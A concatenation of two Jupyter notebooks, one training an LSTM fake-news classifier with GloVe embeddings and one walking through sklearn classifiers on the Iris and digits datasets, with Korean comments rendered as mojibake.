cm = pd.DataFrame(cm , index = ['Fake','Original'] , columns = ['Fake','Original'])
plt.figure(figsize = (10,10))
sns.heatmap(cm,cmap= "Blues", linecolor = 'black' , linewidth = 1 , annot = True, fmt='' , xticklabels = ['Fake','Original'] , yticklabels = ['Fake','Original'])
plt.xlabel("Predicted")
plt.ylabel("Actual")
```
**PLS UPVOTE THIS NOTEBOOK IF YOU LIKE IT! THANKS FOR YOUR TIME !**
|
github_jupyter
|
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# Any results you write to the current directory are saved as output.
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import nltk
from sklearn.preprocessing import LabelBinarizer
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
from wordcloud import WordCloud,STOPWORDS
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize,sent_tokenize
from bs4 import BeautifulSoup
import re,string,unicodedata
from keras.preprocessing import text, sequence
from sklearn.metrics import classification_report,confusion_matrix,accuracy_score
from sklearn.model_selection import train_test_split
from string import punctuation
from nltk import pos_tag
from nltk.corpus import wordnet
import keras
from keras.models import Sequential
from keras.layers import Dense,Embedding,LSTM,Dropout
from keras.callbacks import ReduceLROnPlateau
import tensorflow as tf
true = pd.read_csv("../input/fake-and-real-news-dataset/True.csv")
false = pd.read_csv("../input/fake-and-real-news-dataset/Fake.csv")
true.head()
false.head()
true['category'] = 1
false['category'] = 0
df = pd.concat([true,false]) #Merging the 2 datasets
sns.set_style("darkgrid")
sns.countplot(df.category)
df.head()
df.isna().sum() # Checking for nan Values
df.title.count()
df.subject.value_counts()
plt.figure(figsize = (12,8))
sns.set(style = "whitegrid",font_scale = 1.2)
chart = sns.countplot(x = "subject", hue = "category" , data = df)
chart.set_xticklabels(chart.get_xticklabels(),rotation=90)
df['text'] = df['text'] + " " + df['title']
del df['title']
del df['subject']
del df['date']
stop = set(stopwords.words('english'))
punctuation = list(string.punctuation)
stop.update(punctuation)
def strip_html(text):
soup = BeautifulSoup(text, "html.parser")
return soup.get_text()
#Removing the square brackets
def remove_between_square_brackets(text):
return re.sub('\[[^]]*\]', '', text)
# Removing URL's
def remove_between_square_brackets(text):
return re.sub(r'http\S+', '', text)
#Removing the stopwords from text
def remove_stopwords(text):
final_text = []
for i in text.split():
if i.strip().lower() not in stop:
final_text.append(i.strip())
return " ".join(final_text)
#Removing the noisy text
def denoise_text(text):
text = strip_html(text)
text = remove_between_square_brackets(text)
text = remove_stopwords(text)
return text
#Apply function on review column
df['text']=df['text'].apply(denoise_text)
plt.figure(figsize = (20,20)) # Text that is not Fake
wc = WordCloud(max_words = 2000 , width = 1600 , height = 800 , stopwords = STOPWORDS).generate(" ".join(df[df.category == 1].text))
plt.imshow(wc , interpolation = 'bilinear')
plt.figure(figsize = (20,20)) # Text that is Fake
wc = WordCloud(max_words = 2000 , width = 1600 , height = 800 , stopwords = STOPWORDS).generate(" ".join(df[df.category == 0].text))
plt.imshow(wc , interpolation = 'bilinear')
fig,(ax1,ax2)=plt.subplots(1,2,figsize=(12,8))
text_len=df[df['category']==1]['text'].str.len()
ax1.hist(text_len,color='red')
ax1.set_title('Original text')
text_len=df[df['category']==0]['text'].str.len()
ax2.hist(text_len,color='green')
ax2.set_title('Fake text')
fig.suptitle('Characters in texts')
plt.show()
fig,(ax1,ax2)=plt.subplots(1,2,figsize=(12,8))
text_len=df[df['category']==1]['text'].str.split().map(lambda x: len(x))
ax1.hist(text_len,color='red')
ax1.set_title('Original text')
text_len=df[df['category']==0]['text'].str.split().map(lambda x: len(x))
ax2.hist(text_len,color='green')
ax2.set_title('Fake text')
fig.suptitle('Words in texts')
plt.show()
fig,(ax1,ax2)=plt.subplots(1,2,figsize=(20,10))
word=df[df['category']==1]['text'].str.split().apply(lambda x : [len(i) for i in x])
sns.distplot(word.map(lambda x: np.mean(x)),ax=ax1,color='red')
ax1.set_title('Original text')
word=df[df['category']==0]['text'].str.split().apply(lambda x : [len(i) for i in x])
sns.distplot(word.map(lambda x: np.mean(x)),ax=ax2,color='green')
ax2.set_title('Fake text')
fig.suptitle('Average word length in each text')
def get_corpus(text):
words = []
for i in text:
for j in i.split():
words.append(j.strip())
return words
corpus = get_corpus(df.text)
corpus[:5]
from collections import Counter
counter = Counter(corpus)
most_common = counter.most_common(10)
most_common = dict(most_common)
most_common
from sklearn.feature_extraction.text import CountVectorizer
def get_top_text_ngrams(corpus, n, g):
vec = CountVectorizer(ngram_range=(g, g)).fit(corpus)
bag_of_words = vec.transform(corpus)
sum_words = bag_of_words.sum(axis=0)
words_freq = [(word, sum_words[0, idx]) for word, idx in vec.vocabulary_.items()]
words_freq =sorted(words_freq, key = lambda x: x[1], reverse=True)
return words_freq[:n]
plt.figure(figsize = (16,9))
most_common_uni = get_top_text_ngrams(df.text,10,1)
most_common_uni = dict(most_common_uni)
sns.barplot(x=list(most_common_uni.values()),y=list(most_common_uni.keys()))
plt.figure(figsize = (16,9))
most_common_bi = get_top_text_ngrams(df.text,10,2)
most_common_bi = dict(most_common_bi)
sns.barplot(x=list(most_common_bi.values()),y=list(most_common_bi.keys()))
plt.figure(figsize = (16,9))
most_common_tri = get_top_text_ngrams(df.text,10,3)
most_common_tri = dict(most_common_tri)
sns.barplot(x=list(most_common_tri.values()),y=list(most_common_tri.keys()))
x_train,x_test,y_train,y_test = train_test_split(df.text,df.category,random_state = 0)
max_features = 10000
maxlen = 300
tokenizer = text.Tokenizer(num_words=max_features)
tokenizer.fit_on_texts(x_train)
tokenized_train = tokenizer.texts_to_sequences(x_train)
x_train = sequence.pad_sequences(tokenized_train, maxlen=maxlen)
tokenized_test = tokenizer.texts_to_sequences(x_test)
X_test = sequence.pad_sequences(tokenized_test, maxlen=maxlen)
EMBEDDING_FILE = '../input/glove-twitter/glove.twitter.27B.100d.txt'
def get_coefs(word, *arr):
return word, np.asarray(arr, dtype='float32')
embeddings_index = dict(get_coefs(*o.rstrip().rsplit(' ')) for o in open(EMBEDDING_FILE))
all_embs = np.stack(embeddings_index.values())
emb_mean,emb_std = all_embs.mean(), all_embs.std()
embed_size = all_embs.shape[1]
word_index = tokenizer.word_index
nb_words = min(max_features, len(word_index))
#change below line if computing normal stats is too slow
embedding_matrix = embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
if i >= max_features: continue
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None: embedding_matrix[i] = embedding_vector
batch_size = 256
epochs = 10
embed_size = 100
learning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy', patience = 2, verbose=1,factor=0.5, min_lr=0.00001)
x_train[0]
#Defining Neural Network
model = Sequential()
#Non-trainable embeddidng layer
model.add(Embedding(max_features, output_dim=embed_size, weights=[embedding_matrix], input_length=maxlen, trainable=False))
#LSTM
model.add(LSTM(units=128 , return_sequences = True , recurrent_dropout = 0.25 , dropout = 0.25))
model.add(LSTM(units=64 , recurrent_dropout = 0.1 , dropout = 0.1))
model.add(Dense(units = 32 , activation = 'relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer=keras.optimizers.Adam(lr = 0.01), loss='binary_crossentropy', metrics=['accuracy'])
model.summary()
history = model.fit(x_train, y_train, batch_size = batch_size , validation_data = (X_test,y_test) , epochs = epochs , callbacks = [learning_rate_reduction])
print("Accuracy of the model on Training Data is - " , model.evaluate(x_train,y_train)[1]*100 , "%")
print("Accuracy of the model on Testing Data is - " , model.evaluate(X_test,y_test)[1]*100 , "%")
epochs = [i for i in range(10)]
fig , ax = plt.subplots(1,2)
train_acc = history.history['accuracy']
train_loss = history.history['loss']
val_acc = history.history['val_accuracy']
val_loss = history.history['val_loss']
fig.set_size_inches(20,10)
ax[0].plot(epochs , train_acc , 'go-' , label = 'Training Accuracy')
ax[0].plot(epochs , val_acc , 'ro-' , label = 'Testing Accuracy')
ax[0].set_title('Training & Testing Accuracy')
ax[0].legend()
ax[0].set_xlabel("Epochs")
ax[0].set_ylabel("Accuracy")
ax[1].plot(epochs , train_loss , 'go-' , label = 'Training Loss')
ax[1].plot(epochs , val_loss , 'ro-' , label = 'Testing Loss')
ax[1].set_title('Training & Testing Loss')
ax[1].legend()
ax[1].set_xlabel("Epochs")
ax[1].set_ylabel("Loss")
plt.show()
pred = model.predict_classes(X_test)
pred[:5]
print(classification_report(y_test, pred, target_names = ['Fake','Not Fake']))
cm = confusion_matrix(y_test,pred)
cm
cm = pd.DataFrame(cm , index = ['Fake','Original'] , columns = ['Fake','Original'])
plt.figure(figsize = (10,10))
sns.heatmap(cm,cmap= "Blues", linecolor = 'black' , linewidth = 1 , annot = True, fmt='' , xticklabels = ['Fake','Original'] , yticklabels = ['Fake','Original'])
plt.xlabel("Predicted")
plt.ylabel("Actual")
| 0.567697 | 0.810254 |
Iris ๋ฐ์ดํฐ๋ฅผ ๊ฐ์ง๊ณ ํ์ข
๋ถ๋ฅ๋ฅผ ํด๋ณด์.
sklearn ์ ๋ด์ฅ๋ ๋ฐ์ดํฐ์
์ค ํ๋
peral: ๊ฝ์, sepal: ๊ฝ๋ฐ์นจ
1. ๋ฐ์ดํฐ ์ค๋น , ์์ธํ ์ดํด๋ณด๊ธฐ
```
#๋ฐ์ดํฐ๋ฅผ ๋ถ๋ฌ์จ๋ค
from sklearn.datasets import load_iris
iris = load_iris()
print(type(dir(iris)))
#dir()๋ ๊ฐ์ฒด๊ฐ ์ด๋ค ๋ณ์์ ๋ฉ์๋๋ฅผ ๊ฐ์ง๊ณ ์๋์ง ๋์ดํจ
#iris ์ ์ด๋ค ์ ๋ณด๋ค์ด ๋ด๊ฒผ๋์ง keys() ๋ผ๋ ๋ฉ์๋๋ก ํ์ธ
iris.keys()
#๊ฐ์ฅ ์ค์ํ ๋ฐ์ดํฐ๋ iris_data ๋ณ์์ ์ ์ฅํ ํฌ๊ธฐ๋ฅผ ํ์ธ
iris_data = iris.data
print(iris_data.shape)
iris_data[0]
#์์๋๋ก sepal length, speal width, petal length, petal width
#์ฐ๋ฆฌ๋ ๊ฝ์๊ณผ ๊ฝ๋ฐ์นจ์ ๊ธธ์ด๊ฐ ์ฃผ์ด์ง๋ ๊ฒฝ์ฐ ๊ทธ ์ธ๊ฐ์ง ํ์ข
์ค ์ด๋ค๊ฒ์ธ์ง ๋ฅผ ๋ง์ถ๊ณ ์ถ๋ค
#๋จธ์ ๋ฌ๋๋ชจ๋ธ ์๊ฒ ๊ฝ์, ๊ฝ๋ฐ์นจ์ ๊ธธ์ด์ ํญ, ๋ถ๊ฝ์ ํ์ข์ ์ถ๋ ฅํ๋๋ก ํ์ต์์ผ์ผํจ
#์ฌ๊ธฐ์ ๋ชจ๋ธ์ด ์ถ๋ ฅํด์ผ ํ๋ ์ ๋ต์ ๋ผ๋ฒจ(label), ๋๋ ํ๊ฒ(target) ์ด๋ผ๊ณ ํ๋ค.
iris_label = iris.target
print(iris_label.shape)
iris_label
#์ด ๋ผ๋ฒจ์ ๋ฃ์ ํ๊ฒ์ ์ซ์๋ ๋ฌด์์ ๋ํ๋ด๋ ๊ฑธ๊น์?
#๋ผ๋ฒจ์ ์ด๋ฆ์ target_names ์์ ํ์ธ๊ฐ๋ฅ
iris.target_names
#์์๋๋ก 0 1 2
print(iris.DESCR)
iris.feature_names
#4๊ฐ์ ๊ฐ feature์ ๋ํ ์ค๋ช
์ด ๋ด๊ฒจ์์.
iris.filename #๋ฐ์ดํฐ์
ํ์ผ์ด ์ ์ฅ๋ ๊ฒฝ๋ก
```
2. ๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์ ํ์ต์ํค๊ธฐ ์ํ ๋ฌธ์ ์ง์ ์ ๋ต์ง ์ค๋น
```
#ํ๋ค์ค๋ ํ์ด์ฌ์์ ํ ํํ๋ก ์ด๋ฃจ์ด์ง 2์ฐจ์ ๋ฐฐ์ด ๋ฐ์ดํฐ๋ฅผ ๋ค๋ฃจ๋๋ฐ ๋ง์ด ์ฐ์
#iris ๋ฐ์ดํฐ ๋ํ ํ๊ณผ ์ด์ด ์๋ 2์ฐจ์ ๋ฐ์ดํฐ์ด๋ฏ๋ก pandas๋ฅผ ํ์ฉํด๋ณด์
import pandas as pd
print(pd.__version__)
#๋ถ๊ฝ ๋ฐ์ดํฐ์
์ pandas ๊ฐ ์ ๊ณตํ๋ DataFrame์ด๋ผ๋ ์๋ฃํ์ผ๋ก ๋ณํํด๋ณด์
iris_df = pd.DataFrame(data=iris_data, columns=iris.feature_names)
#์ดํด๋ฅผ ์ํด iris_data์ iris.feature_names ๋ฅผ ์ถ๋ ฅํด๋ณด์
print(iris_data)
print(iris.feature_names)
#์ด ๋๊ฐ๋ฅผ ๋ถ๋ฌ์ ๋ง๋ DataFrame์ ์ดํด๋ณด์.
iris_df.head()
#์ ๋ต ๋ฐ์ดํฐ๋ ํจ๊ป ์๋ค๋ฉด ๋ฐ์ดํฐ๋ฅผ ๋ค๋ฃจ๊ธฐ ๋ ํธ๋ฆฌํ๋, label ์ด๋ผ๋ ์ปฌ๋ผ์ ์ถ๊ฐ
iris.target
iris_df["label"] = iris.target
iris_df.head()
#์ฌ๊ธฐ์ 4๊ฐ์ง์ feature ๋ฐ์ดํฐ๋ค์ ๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์ด ํ์ด์ผ ํ๋ ๋ฌธ์ ์ง์ ๊ฐ์.
#[5.1, 3.5, 1.4, 0.2] ๋ผ๋ ๋ฌธ์ ๊ฐ ์ฃผ์ด์ง๋ค๋ฉด ๋ชจ๋ธ์ 0 ์ฆ setosa
#๋ฐ๋ผ์ 0,1,2 ์ ๊ฐ์ด ํํ๋ label๋ฐ์ดํฐ๋ ๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์๊ฒ ์ ๋ต์ง์ด๋ค.
#๋ฌธ์ ์ง: ๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์๊ฒ ์
๋ ฅ๋๋ ๋ฐ์ดํฐ. feature ๋ผ๊ณ ๋ถ๋ฅด๊ธฐ๋ํ๋ค. ๋ณ์๋ก๋ x๋ฅผ ๋ง์ด ์ฌ์ฉ
#์ ๋ต์ง: ๋ชจ๋ธ์ด ๋ง์ถ์ด์ผ ํ๋ ๋ฐ์ดํฐ. label ๋๋ target์ด๋ผ๊ณ ๋ถ๋ฅด๊ธฐ๋ํจ.๋ณ์ ์ด๋ฆ์ผ๋ก y๋ฅผ ๋ง์ด์ฌ์ฉ
#๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์ ํ์ต์ํค๋ ค๋ฉด
#ํ์ต์ ์ฌ์ฉํ๋ training dataset
#๋ชจ๋ธ์ ์ฑ๋ฅ์ ํ๊ฐํ๋ ๋ฐ ์ฌ์ฉํ๋ test dataset์ผ๋ก ๋๋๋ ์์
์ด ํ์
#๋ฐ์ดํฐ์
์ ๋ถ๋ฆฌํ๋๊ฒ์ scikit-learn์ด ์ ๊ณตํ๋ train_test_split ์ด๋ผ๋ ํจ์๋ก ๊ฐ๋จํ ๊ฐ๋ฅ.
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(iris_data,
iris_label,
test_size=0.2,
random_state=7)
print('X_train ๊ฐ์: ', len(X_train), 'X_test ๊ฐ์: ', len(X_test))
#์ฒซ๋ฒ์งธ ํ๋ผ๋ฏธํฐ์ธ iris_data๋ ๋ฌธ์ ์ง, ์ฆ feature
#๋๋ฒ์งธ ํ๋ผ๋ฏธํฐ์ธ iris_label์ ์ ๋ต๊ฐ, ์ฆ label
#์ด๋ ๊ฒ ํด์ 4๊ฐ์ feature ๋ฐ์ดํฐ๋ง ์๋ x
#์ ๋ต ๋ฐ์ดํฐ๋ง ์๋ y๋ฅผ ์ป์
#์ธ๋ฒ์งธ ์ธ์์ธ test_size ๋ก๋ test dataset์ ํฌ๊ธฐ๋ฅผ ์กฐ์ ๊ฐ๋ฅ 0.2๋ ์ ์ฒด์ 20%
#๋ง์ง๋ง์ผ๋ก ์ด random_state ๋ train ๋ฐ์ดํฐ์ test ๋ฐ์ดํฐ๋ฅผ ๋ถ๋ฆฌํ๋๋ฐ ์ ์ฉ๋๋ ๋๋ค์ ๊ฒฐ์
#๋ง์ฝ ์ด ๋ฐ์ดํฐ ๊ทธ๋๋ ํ์ต์ฉ๊ณผ ํ
์คํธ์ฉ ๋ฐ์ดํฐ๋ฅผ ๋๋๋ค๋ฉด ๋ค์ชฝ์ 20%๊ฐ ํ
์คํธ์ฉ ๋ฐ์ดํฐ์
์ผ๋ก ๋ง๋ค์ด์ง๊ธฐ ๋๋ฌธ์
#ํ
์คํธ์ฉ ๋ฐ์ดํฐ์
์ ๋ผ๋ฒจ์ด 2์ธ ๋ฐ์ดํฐ๋ก๋ง ๊ตฌ์ฑ๋จ
#๊ทธ๋์ ๋ฐ์ดํฐ ๋ถ๋ฆฌ์ ๋๋ค์ผ๋ก ์๋ ๊ณผ์ ์ด ํ์ํ๊ณ random_state๊ฐ ์ด ์ญํ ์ ํ๊ฒ๋จ
#์ปดํจํฐ์์ ๋๋ค์ ํน์ ๋ก์ง์ ๋ฐ๋ผ ๊ฒฐ์ ๋๋ ์๋ฒฝํ ๋๋ค์ ์๋
#๊ทธ๋์ ๋๋ค์ ์กฐ์ ํ ์ ์๋ ๊ฐ์ธ random_state, random_seed ๋ฅผ ์ฌ์ฉ
# ์ด ๊ฐ์ด ๊ฐ๋ค๋ฉด ์ฝ๋๋ ํญ์ ๊ฐ์ ๋๋ค ๊ฒฐ๊ณผ๋ฅผ ๋ํ๋
#๋ฐ์ดํฐ์
์ ํ์ธ
print(X_train.shape, y_train.shape)
print(X_test.shape, y_test.shape)
print(y_train)
print()
print( y_test)
#์์์ ํ์ธํ label ๊ณผ๋ ๋ค๋ฅด๊ฒ 0,1,2๊ฐ ๋ฌด์์๋ก ์์ฌ์๋ค.
```
3. ๋จธ์ ๋ฌ๋ ๋ชจ๋ธ ํ์ต์ํค๊ธฐ
```
#๋จธ์ ๋ฌ๋์ ์ง๋ํ์ต(Supervised Learning), ๋น์ง๋ ํ์ต(Unsupervised Learning)
# ์ง๋ํ์ต์ ์ ๋ต์ด ์๋ ๋ฌธ์ ์ ํ์ต, ๋น์ง๋ ํ์ต์ ์ ๋ต์ด ์๋ ๋ฌธ์ ๋ฅผ ํ์ต
#์ง๋ํ์ต์ ๋๊ฐ์ง๋ก ๋๋์ด์ง
#๋ถ๋ฅ(Classification)์ ํ๊ท(Regression)
#๋ถ๋ฅ๋ ์
๋ ฅ๋ฐ์ ๋ฐ์ดํฐ๋ฅผ ํน์ ์นดํ
๊ณ ์ค ํ๋๋ก ๋ถ๋ฅ
#ํ๊ท๋ ์
๋ ฅ๋ฐ์ ๋ฐ์ดํฐ์ ๋ฐ๋ผ ํน์ ํ๋์ ์์น๋ฅผ ๋ง์ถ๋ ๋ฌธ์ .
#๋ถ๊ฝ ํ์ข
์ ๋ถ๋ฅ๋ฌธ์
#ํ๊ท ๋ฌธ์ ์ ์๋ก ์ง์๋ํ ์ ๋ณด(ํ์,์์น,์ธต์ ๋ฑ)๋ฅผ ์
๋ ฅ๋ฐ์ ๊ทธ ์ง์ ๊ฐ๊ฒฉ์ ๋ง์ถ๋ ๋ฌธ์
#๋ถ๊ฝ ๋ฌธ์ ๋ ์ง๋ํ์ต์ด๋ฉฐ ๋ถ๋ฅ ๋ฌธ์
#๋จธ์ ๋ฌ๋ ๋ชจ๋ธ์ ๋ญ ์ฌ์ฉํ ์ง ๋ช
ํํด์ง
#๋ถ๋ฅ๋ชจ๋ธ์ ์์ฃผ ๋ค์ ํ์ง๋ง ๊ทธ์ค Decision Tree ๋ชจ๋ธ์ ์ฌ์ฉ
#์์ฌ๊ฒฐ์ ๋๋ฌด๋ ๊ฒฐ์ ๊ฒฝ๊ณ๊ฐ ๋ฐ์ดํฐ ์ถ์ ์์ง์ด์ด์ ํน์ ๋ฐ์ดํฐ๋ง ์ ์๋ํ ์ ์๋ค๋ ๋ฌธ์ ๊ฐ ์์
#์ด๋ฅผ ๊ทน๋ณตํ๊ธฐ์ํด ์ ์๋ ๋ชจ๋ธ์ด Random Forest, ์ฌ๋ฌ๊ฐ์ Decision Tree๋ฅผ ํฉ์ณ์ ๋ง๋ค์ด ๋์ ๊ฐ๋
#๊ฐ๋จํ Decision Tree๋ ์์ฌ ๊ฒฐ์ ์ ํ , ์ฆ ๋ฐ์ดํฐ๋ฅผ ๋ถ๋ฆฌํ ์ด๋ ๊ฒฝ๊ณ๋ฅผ ์ฐพ์๋ด
#๋ฐ์ดํฐ๋ฅผ ์ฒด์ ๊ฑฐ๋ฅด๋ฏ ํ๋จ๊ณ์ฉ ๋ถ๋ฅํด ๋๊ฐ๋ ๋ชจ๋ธ
#์ด ๊ณผ์ ์ ์ํธ๋กํผ, ์ ๋ณด๋, ์ง๋๋ถ์๋ ๋ฑ์ ๊ฐ๋
์ด ํฌํจ. ๋จธ์ ๋ฌ๋ ์๊ณ ๋ฆฌ์ฆ ์ดํด๋ฅผ ์ํด ํ์
#sklearn.tree ํจํค์ง ์์ DecisionTreeClassifier ๋ผ๋ ์ด๋ฆ์ผ๋ก ๋ด์ฅ๋์์
from sklearn.tree import DecisionTreeClassifier
decision_tree = DecisionTreeClassifier(random_state=32)
print(decision_tree._estimator_type)
#๋ชจ๋ธํ์ต
decision_tree.fit(X_train, y_train)
#training dataset ์ผ๋ก ๋ชจ๋ธ์ ํ์ต์ํจ๋ค๋ ๊ฒ์
#training dataset์ ๋ง๊ฒ ๋ชจ๋ธ์ fitting, ๋ง์ถ๋ ๊ฒ
#training dataset์ ์๋ ๋ฐ์ดํฐ๋ค์ ํตํด ์ด๋ ํ ํจํด์ ํ์
ํ๊ณ ,
#๊ทธ ํจํด์ ๋ง๊ฒ ์์ธก์ ํ ์ ์๋๋ก ํ์ต๋๊ธฐ ๋๋ฌธ์
๋๋ค.
#๋ค๋ฅธ ๋ง๋ก ํ๋ฉด ๋ชจ๋ธ์ training dataset์ ์กด์ฌํ์ง ์๋ ๋ฐ์ดํฐ์ ๋ํด์๋
#์ ํํ ์ ๋ต ์นดํ
๊ณ ๋ฆฌ๊ฐ ๋ฌด์์ธ์ง ์์ง ๋ชปํจ.
#๋ค๋ง training dataset์ ํตํด ํ์ตํ ํจํด์ผ๋ก
#์๋ก์ด ๋ฐ์ดํฐ๊ฐ ์ด๋ค ์นดํ
๊ณ ๋ฆฌ์ ์ํ ์ง ์์ธกํ ๋ฟ.
#์๋ก์ด ๋ฐ์ดํฐ์ ๋ํด์๋ ์ ๋ง์ถ ์ ์๊ธฐ ์ํด์
#training dataset์ด ์ด๋ป๊ฒ ๊ตฌ์ฑ๋์ด ์๋์ง๊ฐ ๋งค์ฐ ์ค์
#๋ ๋ค์ํ, ๋ ์ผ๋ฐํ ๋ ๋ฐ์ดํฐ๋ก ํ์ต์ด ๋ ์๋ก ์๋ก์ด ๋ฐ์ดํฐ์ ๋ํด์๋ ์ ๋ง์ถ ์ ์์
```
4. ๋จธ์ ๋ฌ๋ ๋ชจ๋ธ ํ๊ฐํ๊ธฐ
```
y_pred = decision_tree.predict(X_test)
y_pred
#X_test๋ฐ์ดํฐ๋ feature (๋ฌธ์ ) ๋ง ์กด์ฌ
#๋ฐ๋ผ์ ํ์ต์ด ์๋ฃ๋ decision_tree ๋ชจ๋ธ์ X_test ๋ฐ์ดํฐ๋ก predict๋ฅผ ์คํํ๋ฉด
#๋ชจ๋ธ์ด ์์ธกํ y_pred๋ฅผ ์ป๊ฒ๋จ
#์ค์ ์ ๋ต์ธ y_test์ ๋น๊ตํด๋ณด์
y_test
#์ฑ๋ฅํ๊ฐ์ ๋ํ ํจ์๋ค์ด ๋ชจ์ฌ์๋ sklearn.metrics ํจํค์ง๋ฅผ ์ด์ฉ
#์ ํ๋Accuracy ๋ฅผ ๊ฐ๋จํ ํ์ธ
from sklearn.metrics import accuracy_score
accuracy = accuracy_score(y_test, y_pred)
accuracy
#์ ์ฒด ๊ฐ์์ค ๋ง์๊ฒ์ ๊ฐ์์ ์์น๋ฅผ ๋ํ๋. 90ํผ์ผํธ์ ์ ํ๋
#์ ํ๋ = ์์ธก๊ฒฐ๊ณผ๊ฐ์ ๋ต์ธ๋ฐ์ดํฐ์๊ฐ์ / ์์ธกํ์ ์ฒด๋ฐ์ดํฐ์๊ฐ์
```
5. ๋ค๋ฅธ ๋ชจ๋ธ๋ก ์ค์ตํด๋ณด๊ธฐ
```
#๋ค๋ฅธ ๋ชจ๋ธ์ ๋ค๋ฃจ๊ธฐ ์ ์ Decision Tree ๋ชจ๋ธ์ ํ์ต์ํค๊ณ ์์ธกํ๋ ๊ณผ์ ์ ๋ณต์ต
# 1.ํ์ํ ๋ชจ๋ import
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report
# 2.๋ฐ์ดํฐ ์ค๋น.
iris = load_iris()
iris_data = iris.data
iris_label = iris.target
# 3.train, test ๋ฐ์ดํฐ๋ถ๋ฆฌ
X_train, X_test, y_train, y_test = train_test_split(iris_data,
iris_label,
test_size=0.2,
random_state=7)
# 4.๋ชจ๋ธ ํ์ต ๋ฐ ์์ธก
decision_tree = DecisionTreeClassifier(random_state=32)
decision_tree.fit(X_train, y_train)
y_pred = decision_tree.predict(X_test)
print(classification_report(y_test, y_pred))
```
Decision Tree๋ฅผ ์ฌ๋ฌ๊ฐ ๋ชจ์๋์ RandomForest.
๋จ์ผ ๋ชจ๋ธ์ ์ฌ๋ฌ ๊ฐ ์ฌ์ฉํ๋ ๋ฐฉ๋ฒ์ ์ทจํจ์ผ๋ก์จ ๋ชจ๋ธ ํ ๊ฐ๋ง ์ฌ์ฉํ ๋์ ๋จ์ ์ ์ง๋จ ์ง์ฑ์ผ๋ก ๊ทน๋ณตํ๋ ๊ฐ๋
์ ๊ธฐ๋ฒ์ธ ์์๋ธ
Random Forest์ Random์ ๋ฌด์์ด ๋๋ค์ด๋ผ๋ ๊ฒ์ ๋ํ๋ด๋๊ฐ?
์ฌ๋ฌ๊ฐ์ ์์ฌ ๊ฒฐ์ ํธ๋ฆฌ๋ฅผ ๋ชจ์ ๋์๊ฒ์ผ๋ก, ๊ฐ๊ฐ์ ์์ฌ ๊ฒฐ์ ํธ๋ฆฌ๋ฅผ ๋ง๋ค๊ธฐ ์ํด ์ฐ์ด๋ ํน์ฑ๋ค์ ๋๋ค์ผ๋ก ์ ํํ๋ค
```
#SVM ๋ชจ๋ธ์ ๋ค์๊ณผ ๊ฐ์ด ์ฌ์ฉํฉ๋๋ค.
from sklearn import svm
svm_model = svm.SVC()
print(svm_model._estimator_type)
svm_model.fit(X_train, y_train)
y_pred = svm_model.predict(X_test)
print(classification_report(y_test, y_pred))
from sklearn.linear_model import SGDClassifier
sgd_model = SGDClassifier()
print(sgd_model._estimator_type)
sgd_model.fit(X_train, y_train)
y_pred = sgd_model.predict(X_test)
print(classification_report(y_test, y_pred))
# Logistic Regression
from sklearn.linear_model import LogisticRegression
logistic_model = LogisticRegression()
print(logistic_model._estimator_type)
logistic_model.fit(X_train, y_train)
y_pred = logistic_model.predict(X_test)
print(classification_report(y_test, y_pred))
```
์ค์ฐจํ๋ ฌ iris
```
from sklearn.datasets import load_digits
digits = load_digits()
digits.keys()
digits_data = digits.data
digits_data.shape
digits_data[0]
#์ด๋ฏธ์ง๋ฅผ ๋ณด๊ธฐ์ํด ๋งทํ๋๋ฆฝ ์ํฌํธ
import matplotlib.pyplot as plt
%matplotlib inline
plt.imshow(digits.data[0].reshape(8,8), cmap='gray')
plt.axis('off')
plt.show()
#์ฌ๋ฌ ๊ฐ์ ์ด๋ฏธ์ง๋ฅผ ํ๋ฒ์ ํ์ธํ๊ธฐ
for i in range(10):
plt.subplot(2, 5, i+1)
plt.imshow(digits.data[i].reshape(8,8), cmap='gray')
plt.axis('off')
plt.show()
#target ๋ฐ์ดํฐ๋ ์ด๋จ๊น
digits_label = digits.target
print(digits_label.shape)
digits_label[:20]
#์ ํ๋์ ํจ์ ์ ํ์ธํ๊ธฐ ์ํด, ํด๋น ์ด๋ฏธ์ง์ ๋ฐ์ดํฐ๊ฐ 3์ธ์ง ์๋์ง๋ฅผ ๋ง์ถ๋ ๋ฌธ์ ๋ก ๋ณํ
#์
๋ ฅ๋ ๋ฐ์ดํฐ๊ฐ 3์ด๋ผ๋ฉด 3์, 3์ด ์๋ ๋ค๋ฅธ ์ซ์๋ผ๋ฉด 0์ ์ถ๋ ฅ
new_label = [3 if i == 3 else 0 for i in digits_label]
new_label[:20]
#์ด ๋ฌธ์ ๋ฅผ ํ๊ธฐ ์ํด ๋ค์ Decision Tree๋ฅผ ํ์ต
X_train, X_test, y_train, y_test = train_test_split(digits_data,
new_label,
test_size=0.2,
random_state=15)
decision_tree = DecisionTreeClassifier(random_state=15)
decision_tree.fit(X_train, y_train)
y_pred = decision_tree.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
accuracy
fake_pred = [0] * len(y_pred)
accuracy = accuracy_score(y_test, fake_pred)
accuracy
```
์ ๋ต๊ณผ ์ค๋ต์๋ ์ข
๋ฅ๊ฐ ์๋ค!
